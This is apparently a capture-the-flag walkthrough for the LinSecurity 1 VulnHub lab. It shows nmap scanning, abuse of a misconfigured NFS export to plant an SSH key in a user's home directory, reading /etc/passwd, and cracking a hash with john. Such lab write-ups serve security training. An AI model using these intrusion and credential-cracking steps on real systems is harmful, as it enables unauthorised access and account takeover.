Link: https://www.vulnhub.com/entry/linsecurity-1,244/
- Net Discovery
nmap -sn 10.0.2.27/24
My target is 10.0.2.26.
2. Port scan
nmap -Pn 10.0.2.26nmap -Pn -p1000- 10.0.2.26
There’re 7 open ports: 22, 111, 2049, 35049, 38329, 57299, and 59475.
3. OS and service scan
nmap -A -p22,111,2049,35049,38329,57299,59475 10.0.2.26
There’s an NFS service.
4. Vuln scan
nmap --script vuln -p22,111,2049,35049,38329,57299,59475 10.0.2.26
Nothing useful
5. NFS scan
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.2.26
There’s a misconfiguration. I can mount ‘/home/peter’ to my machine.
6. Mounting /home/peter
mkdir mntlsmount 10.0.2.26:/home/peter mntcd mnt ls -la
7. Add public key for SSH login
Verify user permission
stat .
The username is peter, UID is 1001 and GID is 1005.
Adding fake user
groupadd -g 1005 peteradduser peter -uid 1001 -gid 1005
Change user to peter
su peter
Create ssh key
ssh-keygen -t rsa
Copy public key to the mounted directory
mkdir .sshcp /home/peter/.ssh/id_rsa.pub .ssh/authorized_keyscd .sshls -la
Login as peter via ssh w/ private key
ssh -i /home/peter/.ssh/id_rsa peter@10.0.2.26
9. Privilege Escalation
Read /etc/passwd
cat /etc/passwd
There’s password hash of user ‘insecurity’.
Copy the hash to hash.txt
echo AzER3pBZh6WZE > hash.txtcat hash.txt
Crack w/ john
john --wordlist=/root/Desktop/rockyou.txt hash.txtjohn hash.txt --show
I got the password.
NOTE: I already solved this challenge, so my screenshot is displaying as I already cracked it.
Change user to ‘insecurity’
su insecuritywhoami